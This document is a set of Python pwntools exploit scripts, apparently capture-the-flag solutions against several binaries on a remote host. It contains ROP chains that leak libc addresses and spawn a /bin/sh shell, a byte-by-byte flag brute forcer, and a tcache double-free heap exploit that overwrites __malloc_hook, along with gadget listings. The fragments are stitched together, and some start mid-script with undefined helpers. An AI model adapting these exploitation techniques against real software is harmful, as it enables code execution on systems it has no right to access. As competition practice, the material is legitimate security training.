from pwn import * import time debug=0 elf = ELF('./hacker_system_ver1') if debug: p= process('./hacker_system_ver1') context.log_level = 'debug' libc = ELF('/lib/i386-linux-gnu/libc.so.6') gdb.attach(p,'b *0x8048B1B') else: p = remote('111.230.149.72 ', 10005) libc = ELF('./libc32.so') p.recvuntil('>') p.sendline('2') p.recvuntil('length:') p.sendline('200') p.recvuntil('name:') padding = 'a'*0x34 pr = 0x08048455 pppr = 0x08048d49 rop = padding + p32(0x804be00)+p32(elf.symbols['puts']) + p32(pr) + p32(elf.got['puts']) + p32(elf.symbols['read'])+p32(pppr)+p32(0)+p32(0x804be00) + p32(0x100)+ p32(0x08048d4b)+p32(0x804be00)+p32(0x8048B1A)# p32(0x804843e) p.sendline(rop) p.recvuntil('find!!\n') puts_addr = u32(p.recv(4)) print'[+]puts address:',hex(puts_addr) libc.address = puts_addr-libc.symbols['puts'] print'[+]system address:',hex(libc.symbols['system']) rop = p32(0x804bc00)+ p32(libc.symbols['system'])+p32(0xdeadbeef)+p32(next(libc.search('/bin/sh'))) p.send(rop) p.interactive() ''' ============================================================ 0x08048d4b : pop ebp ; ret 0x08048d48 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x08048455 : pop ebx ; ret 0x08048d4a : pop edi ; pop ebp ; ret 0x08048d49 : pop esi ; pop edi ; pop ebp ; ret 0x0804843e : ret 0x080487f0 : ret 0x458b 0x0804819c : ret 0x8694 0x080485ce : ret 0xeac1 '''
if debug: p= process('./zazahui_ver2') #context.log_level = 'debug' gdb.attach(p,'b *0x80487AB') else: p = remote('111.230.149.72 ', 10010) dic = range(33,127) dic.append(0) #qdic.reverse() p.recvuntil('>') start = 0x804A084 end = 0x804A060 flag='' i = start while i>=end: pro = log.progress('go') for j in dic: pro.status('boom for '+hex(i)) bomb = (chr(j)+flag)+'\0'*(0xb0-len((chr(j)+flag)))+p32(i) p.send(bomb) if'too'in p.recvuntil('>'): flag = chr(j) + flag pro.success(hex(i)+': '+hex(j)+' '+chr(j)) i = i-1
addr_leak = p.recvuntil('\x7f')[-6:] puts_addr = u64(addr_leak.ljust(8,'\0')) print'[+] puts : ',hex(puts_addr) libc.address = puts_addr - libc.symbols['puts'] print'[+] system: ',hex(libc.symbols['system']) rop = p64(0x602c00)+ p64(rdi_ret) +p64(next(libc.search('/bin/sh'))) + p64(libc.symbols['system']) p.send(rop) p.interactive() ''' ============================================================ 0x0000000000400a8c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 0x0000000000400a8e : pop r13 ; pop r14 ; pop r15 ; ret 0x0000000000400a90 : pop r14 ; pop r15 ; ret 0x0000000000400a92 : pop r15 ; ret 0x0000000000400a8b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 0x0000000000400a8f : pop rbp ; pop r14 ; pop r15 ; ret 0x0000000000400640 : pop rbp ; ret 0x00000000004009dd : pop rbx ; pop rbp ; ret 0x0000000000400a93 : pop rdi ; ret 0x0000000000400a91 : pop rsi ; pop r15 ; ret 0x0000000000400a8d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret 0x0000000000400541 : ret 0x0000000000400980 : ret 0x458b '''
#step 1 leak libc add('step1\n',0,0x20,'hack by p4nda') add('step1\n',0,0x20,'hack by p4nda') delete_user('step1') add('nop1\n',0,0x38,p64(0x18)+'1'.ljust(0x20,'\0')+p64(3)+p64(elf.got['puts'])) print_user('1') p.recvuntil('intro:') puts_addr = u64(p.recv(6).ljust(8,'\0')) print'[+]puts addr :',hex(puts_addr) libc.address = puts_addr - libc.symbols['puts'] print'[+]system addr :',hex(libc.symbols['system']) #step 2 leak steak add('step2\n',0,0x20,'hack by p4nda') add('step2\n',0,0x20,'hack by p4nda') delete_user('step2') add('nop2\n',0,0x38,p64(0x18)+'2'.ljust(0x20,'\0')+p64(3)+p64(libc.symbols['environ'])) print_user('2') p.recvuntil('intro:') stack_addr = u64(p.recv(6).ljust(8,'\0')) print'[+]stack addr :',hex(stack_addr) stack_offset =0x7ffd3af20438-0x7ffd3af20330 #add('padding\n',18,0x138,'hack by p4nda') #delete_user('nop2') #delete_user('2') #delete_user() ''' add('padding_3\n',18,0x20,'hack by p4nda') add('step3\n',18,0x20,'hack by p4nda') add('step3\n',18,0x20,'hack by p4nda') delete_user('step3') add('nop3\n',18,0x38,p64(0x18)+'3'.ljust(0x20,'\0')+p64(3)+p64(0)) delete_user('nop3') delete_user('3') delete_user('padding_3') add('ctrl3\n',18,0x38,p64(0xdeadbeef)) ''' add('step3\n',0,0x70,'hack by p4nda') add('step3\n',0,0x70,'hack by p4nda') delete_user('step3') delete_user('step3') print'[+]stack addr :',hex(stack_addr) #gdb.attach(p,'b *0x400a0f') add('step3\n',0,0x70,p64(0x61)) add('step3\n',0,0x70,'hack by p4nda') add('step3\n',18,0x70,'hack by p4nda')
add('step4\n',0,0x50,'hack by p4nda') add('step4\n',0,0x50,'hack by p4nda') delete_user('step4') delete_user('step4') #gdb.attach(p,'b *0x400a0f') add('step4\n',0,0x50,p64(libc.symbols['__malloc_hook']+0x10+0x08*6)) add('step4\n',0,0x50,'hack by p4nda') add('step4\n',0,0x50,'hack by p4nda')
add('padding\n',0,0x38,'hack by p4nda') add('padding\n',0,0x38,'hack by p4nda') add('padding\n',0,0x38,'hack by p4nda') add('padding\n',0,0x38,'hack by p4nda') delete_user('padding') add('step4\n',0,0x50,p64(0)*3+p64(stack_addr-stack_offset-0x8)) add('step4\n',0,0x40,p64(0x0000000000401053)+p64(next(libc.search('/bin/sh')))+p64(libc.symbols['system'])) #add('step3\n',18,0x60,'a'*0x40) p.interactive() ''' ============================================================ 0x000000000040104c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 0x000000000040104e : pop r13 ; pop r14 ; pop r15 ; ret 0x0000000000401050 : pop r14 ; pop r15 ; ret 0x0000000000401052 : pop r15 ; ret 0x000000000040104b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 0x000000000040104f : pop rbp ; pop r14 ; pop r15 ; ret 0x0000000000400870 : pop rbp ; ret 0x0000000000401053 : pop rdi ; ret 0x0000000000401051 : pop rsi ; pop r15 ; ret 0x000000000040104d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret 0x0000000000400709 : ret 0x0000000000400782 : ret 0x2018 0x0000000000400abd : ret 0x8b48 '''